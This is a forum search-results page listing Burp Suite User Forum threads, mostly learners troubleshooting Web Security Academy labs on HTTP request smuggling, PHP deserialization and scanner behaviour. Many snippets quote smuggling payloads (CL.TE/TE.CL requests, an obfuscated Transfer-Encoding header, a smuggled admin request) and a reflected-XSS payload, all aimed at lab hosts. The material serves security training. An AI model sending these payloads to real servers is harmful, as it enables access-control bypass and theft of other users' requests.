Burp Suite User Forum

Create new post

Found 205 posts in 138 threads

HTTP Request Smuggling

responses" is given as "POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded server was given as "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded should be like this: "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 146 x=POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 01:54PM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jul 10, 2020 08:07AM UTC | 3 Agent replies | 5 Community replies | How do I?

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Last updated: Jun 05, 2021 09:01AM UTC | 1 Agent replies | 2 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 05, 2021 03:32PM UTC | 1 Agent replies | 2 Community replies | How do I?

HTTP request smuggling, basic TE.CL vulnerability

i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 20, 2020 01:02PM UTC | 1 Agent replies | 1 Community replies | How do I?

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2022 02:11PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Lab: Modifying serialized data types - Debug dumps tokens

p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Last updated: Aug 20, 2021 02:26PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Last updated: Jan 30, 2020 10:00AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

HTTP Request Smuggling

portwigger: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 06:44PM UTC | 1 Agent replies | 2 Community replies | How do I?

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com

Last updated: Jul 05, 2021 10:20AM UTC | 0 Agent replies | 0 Community replies | How do I?

PHP deserialization: Signature does not match

receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2

Last updated: Sep 05, 2023 06:14AM UTC | 1 Agent replies | 1 Community replies | How do I?

ca certificate

The URL is http://burp/ - there's no www.

Last updated: Jun 10, 2020 07:32AM UTC | 7 Agent replies | 9 Community replies | Bug Reports

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 29, 2021 08:07PM UTC | 1 Agent replies | 2 Community replies | How do I?

Bug in Lab

error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

Last updated: May 25, 2021 01:32PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Modifying serialized data types

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

74%39 Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 ??

this error: Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 Then, what I did is:

Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4:"User":2

Last updated: Jul 19, 2023 11:43AM UTC | 8 Agent replies | 15 Community replies | How do I?

Lab 1 Directory traversal(File path traversal, simple case)

3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal

Last updated: May 06, 2022 09:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

0, which is the size of the next chunk in bytes): 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 08, 2022 07:47AM UTC | 6 Agent replies | 6 Community replies | How do I?

Lab: Arbitrary object injection in PHP

burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5

Last updated: Apr 12, 2021 09:19AM UTC | 1 Agent replies | 0 Community replies | How do I?

HTTP request

POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 01, 2023 07:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 03, 2023 11:56AM UTC | 7 Agent replies | 12 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

response when i sent this request POST / HTTP/1.1 Host: my lab id Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Nov 18, 2020 11:51AM UTC | 1 Agent replies | 0 Community replies | How do I?

Missing parameter in HTTP Smuggling request lab

HTTP/1.1 Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jun 29, 2022 02:33PM UTC | 2 Agent replies | 1 Community replies | How do I?

Lab Not Working Properly

HTTP/1.1 Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net Content-Type: application/x-www-form-urlencoded 1.1 Host: aca71f681fe0a61c80c01e0d01930066.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Oct 18, 2021 08:48AM UTC | 5 Agent replies | 11 Community replies | How do I?

Exploiting HTTP request smuggling to perform web cache poisoning - Not getting results.

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Oct 18, 2021 08:49AM UTC | 0 Agent replies | 1 Community replies | How do I?

HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

HTTP/1.1 Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Connection: keep-alive 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jun 12, 2023 12:58PM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab Not Responding

HTTP/1.1 Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 03, 2022 09:11AM UTC | 7 Agent replies | 8 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to capture other users' requests

the lab POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 19, 2021 10:55AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to capture other users' requests-- not solving

HTTP/1.1 Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 277 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 04, 2021 08:08AM UTC | 1 Agent replies | 0 Community replies | How do I?

Issue with simulated victim user in Lab: Internal cache poisoning

However since the simulated user and the exploit server are probably on the same network the "www" part Removing the "www" part did the trick. Thx for your concern.

Last updated: May 06, 2024 10:06PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Sort entries in the site map by domain components before hostname

com.host1.www com.host1.www1 com.net2.www even though the hostnames are actually displayed as expected

Last updated: Apr 24, 2024 08:00AM UTC | 4 Agent replies | 3 Community replies | Feature Requests

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Dec 23, 2021 12:43AM UTC | 4 Agent replies | 5 Community replies | How do I?

Different URLs in Target: Request, Raw and Site map URL

Here is what is shown in the Site map window right above (list of all URLs): https://www. id=WEB87431-20150616190 HTTP/1.1 Same with: https://www._something_ com/ - GET - /bp_chart.php?

Last updated: Jun 19, 2015 08:08AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Exploiting HTTP request smuggling to capture other users' requests

acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Content-Type: application/x-www-form-urlencoded Transfer-encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Length: 600 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 19, 2022 04:36PM UTC | 7 Agent replies | 8 Community replies | How do I?

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

Exploit: ``` POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Last updated: Jan 27, 2022 12:17PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP smuggling

vulnerabilities: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 03, 2022 04:04PM UTC | 2 Agent replies | 2 Community replies | How do I?

Request Smuggling - Lab does not work

0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 24, 2023 06:51AM UTC | 4 Agent replies | 4 Community replies | How do I?

Academy Leaning Material minor mistake on "Finding HTTP request smuggling vulnerabilities" page.

reads as below: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Oct 08, 2021 12:52AM UTC | 0 Agent replies | 0 Community replies | Bug Reports

invisible proxy

Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www

Last updated: Jun 05, 2019 04:40PM UTC | 3 Agent replies | 2 Community replies | How do I?

An incorrect example in the "Exploiting HTTP request smuggling" section on the Web Security Academy.

Transfer-Encoding: chunked 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded supposed to be: 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Jul 21, 2023 07:21AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Lab - Modifying serialized objects login fuction not working properly?

PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request https://0ad70019033a57a1c05c334c004d0082.web-security-academy.net/login Content-Type: application/x-www-form-urlencoded is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www :/usr/share/php&apos;) in /var/www/index.php on line 1</p> </div> </section

Last updated: Oct 24, 2022 03:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded

Content-length: 4 Transfer-Encoding: chunked 5f POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Aug 17, 2022 02:49PM UTC | 2 Agent replies | 4 Community replies | Burp Extensions

Burp scanner ignores scan configuration exclusion lists

/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1 Host: www..... Connection: close Content-Length: 3002 X-Single-Page-Navigation: true Origin: https://www.....

Last updated: Apr 08, 2020 12:24PM UTC | 3 Agent replies | 2 Community replies | Bug Reports

use burp suite

https://www.?elp.com

Last updated: Sep 21, 2017 09:39PM UTC | 0 Agent replies | 0 Community replies | How do I?

Broken chunked-encoding

like Gecko) Chrome/88.0.4324.150 Safari/537.36 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded keep-alive 96 GET /404 HTTP/1.1 X: x=1&q=smugging&x= Host: example.com Content-Type: application/x-www-form-urlencoded

Last updated: Apr 22, 2021 09:58AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to capture other users' requests

HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-Length: 251 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 26, 2022 12:16PM UTC | 1 Agent replies | 0 Community replies | How do I?

BCheck SQLi bypass autentication

: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded

: 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded : 33 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded

Last updated: Feb 29, 2024 01:50PM UTC | 2 Agent replies | 7 Community replies | Burp Extensions

Modifying serialized objects

this - Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.

Last updated: Apr 06, 2021 03:26PM UTC | 2 Agent replies | 0 Community replies | How do I?

Incorrect Issue Type/Advisory Finding & Remediation

As such, it is recommended to set the header as X-XSS-Protection: 0" Reference https://owasp.org/www-project-secure-headers

Last updated: Jul 28, 2021 08:43AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Burp Scaner with form credentials

The Content-Type is: application/x-www-form-urlencoded

Last updated: Feb 25, 2020 02:53PM UTC | 4 Agent replies | 6 Community replies | How do I?

why there is an empty line after Content-Length header in http smuggle attacks?

for example : POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 21, 2022 06:13PM UTC | 0 Agent replies | 1 Community replies | How do I?

Proxy connection closed

7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84 Connection: close Content-Type: application/x-www-form-urlencoded

Last updated: Feb 17, 2018 08:26AM UTC | 3 Agent replies | 5 Community replies | Bug Reports

Advanced Target Scope - Load File

.*\.example\.com\/* test\.net\/path\/here\/* www\.test\.net\/* -----------

Last updated: Mar 30, 2022 09:52AM UTC | 6 Agent replies | 7 Community replies | How do I?

Lab: HTTP request smuggling, basic CL.TE vulnerability

HTTP/1.1 Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net Content-Type: application/x-www-form-urlencoded

0a3500f90359495b811ec02e002700bc.web-security-academy.net\r\n Connection: keep-alive\r\n Content-Type: application/x-www-form-urlencoded

Last updated: May 31, 2023 06:53AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

Upload File to Burp Collaborator

Hi, It looks like you are trying to achieve what is described in the articles below: - https://www

Last updated: May 14, 2020 12:27PM UTC | 1 Agent replies | 0 Community replies | How do I?

Username enumeration via response timing

0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded 0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded

Last updated: Mar 06, 2024 11:23AM UTC | 5 Agent replies | 4 Community replies | How do I?

HTTP request Smuggling CL.TE LAB

HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded

solution : POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Jan 18, 2023 10:45AM UTC | 2 Agent replies | 3 Community replies | How do I?

Lab: CSRF where token is not tied to user session

https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded

Last updated: Jun 08, 2020 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

how do we calculate value for tranfer encoding??

username=carlos HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length

username=carlos HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Feb 02, 2022 11:53AM UTC | 2 Agent replies | 2 Community replies | How do I?

Lab: CL-TE request smuggling lab is not working with the official solution

HTTP/2 Host: 0a6f004904bb0b7282f5067100c70057.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Apr 13, 2023 06:37AM UTC | 1 Agent replies | 0 Community replies | How do I?

multiple request headers in burpsuite community edition v2023.7.2

Cookie: session=8aVCM2qExzt0Y2t1AJ4WhRIKozqAYedJ Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: May 25, 2024 06:30AM UTC | 4 Agent replies | 5 Community replies | How do I?

Lab: HTTP request smuggling, basic CL.TE vulnerability

Connection: keep-alive Content-Length: 10 Transer-Encoding: chunked Content-Type: application/x-www-form-urlencoded

Last updated: Jan 12, 2021 08:22AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: CL-TE request smuggling lab is not working with the official solution.

0ac000af04eed935c3233d650017001f.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: Mar 15, 2023 05:08AM UTC | 2 Agent replies | 3 Community replies | Bug Reports

DOM-based open redirection

burp-suite-explain-dom-based-open-redirection - https://portswigger.net/support/using-burp-to-test-for-open-redirections - https://owasp.org/www-pdf-archive

Last updated: Sep 10, 2021 09:12AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Scanner "X-Forwarded-For dependent response" check alters Content-Type?

Accept-Encoding: gzip, deflate X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6 Content-Type: application/x-www-form-urlencoded Connection: close X-Forwarded-For: 127.0.0.1 Notice the change to "Content-Type: application/x-www-form-urlencoded

Last updated: Jun 01, 2016 08:25AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP1.1 replaced by HTTP/2 in response header?

Every time I send POST / HTTP/1.1 Host: ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Mar 27, 2023 07:35AM UTC | 6 Agent replies | 6 Community replies | Bug Reports

burp doesn't take history like this path #something.php?image=photo.jpg

Directory/path traversal vulnerabilities do not usually take this into account: - https://owasp.org/www-community

Last updated: May 25, 2020 08:07AM UTC | 1 Agent replies | 0 Community replies | How do I?

Create an SSL cert with Certbot for a private collaborator server

certbot certonly --webroot -w /var/www/bc.mydomain -d bc.mydomain I get: Invalid response from http

Last updated: Jun 07, 2021 08:45AM UTC | 1 Agent replies | 0 Community replies | How do I?

Need help with password cracking

br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded br X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb X-Instagram-AJAX: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Aug 24, 2016 08:37AM UTC | 1 Agent replies | 0 Community replies | How do I?

Design new extension - Problem with buildRequest and URL Encode

script>alert(1)</script> Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded http://127.0.0.1/a.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 05, 2018 02:11PM UTC | 6 Agent replies | 6 Community replies | Burp Extensions

Lab : Modifying serialized data types. Bug Decoder?

of the video I get this error : PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 I understand that

Last updated: Mar 15, 2021 01:48PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

"Lab: HTTP request smuggling, basic TE.CL vulnerability" need help in understanding

HTTP/1.1 Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 17, 2020 04:33PM UTC | 2 Agent replies | 1 Community replies | How do I?

Logic error in lntruder module

KHTML, like Gecko) Version/4.0 Chrome/75.0.3770.143 Mobile Safari/537.36 Content-Type: application/x-www-form-urlencoded KHTML, like Gecko) Version/4.0 Chrome/75.0.3770.143 Mobile Safari/537.36 Content-Type: application/x-www-form-urlencoded

Last updated: Jan 13, 2021 03:12PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Server-side pause-based request smuggling ISSUE

web-security-academy.net Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4 Content-Type: application/x-www-form-urlencoded

0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: Jul 05, 2024 08:21AM UTC | 4 Agent replies | 2 Community replies | How do I?

Burpsuite 2.0.0.5 Beta - SocketException on crawls and audits

redirected to the secure version so that's not exactly helpful), and oftentimes, subdomains other than www

Last updated: Sep 17, 2018 11:13AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Exploiting HTTP request smuggling to perform web cache deception NOT WORKING

HTTP/1.1 Host: ac921f9e1e43510980d00f8c0079000b.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Last updated: Sep 13, 2021 08:11AM UTC | 2 Agent replies | 2 Community replies | How do I?

Burp Does Not Redirect

<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="https://...

Last updated: Jan 31, 2023 12:06PM UTC | 10 Agent replies | 5 Community replies | Bug Reports

TE.CL smuggling labs - official solutions do not work

Connection: keep-alive Transfer-Encoding: chunked 5b GLOOL / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 19, 2023 07:30AM UTC | 1 Agent replies | 3 Community replies | Bug Reports

'Drop all out-of-scope requests' not behaving as expected

Add an entry, protocol 'Any', Host or IP range '^www\.google\.com$', leave the rest blank 3.

Last updated: Feb 20, 2019 01:56PM UTC | 1 Agent replies | 1 Community replies | How do I?

Missing PHP Code Injection Detection

module=login&method=loginForm Content-Type: application/x-www-form-urlencoded Content-Length: 63 Cookie

module=login&method=loginForm Content-Type: application/x-www-form-urlencoded Content-Length: 63 Cookie

Last updated: Jun 24, 2020 01:30PM UTC | 1 Agent replies | 2 Community replies | Bug Reports

Lab: HTTP request smuggling, basic CL.TE vulnerability (Help for a noob)

1.1 Host: yourclientid.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: Aug 20, 2019 09:50PM UTC | 0 Agent replies | 1 Community replies | How do I?

Send request in the same connection turbo intruder

req POST / HTTP/1.1 Host: example.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: Sep 28, 2022 02:16PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

2FA bypass using a brute-force attack

q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2021 08:49PM UTC | 3 Agent replies | 3 Community replies | How do I?

Bug in Site map tab while showing only items in scope.

browse to the URL www.sapo.pt In the scope I have reg exp with: Protocol: HTTP Host or IP: ^www

Last updated: Mar 25, 2015 08:24AM UTC | 4 Agent replies | 5 Community replies | Bug Reports

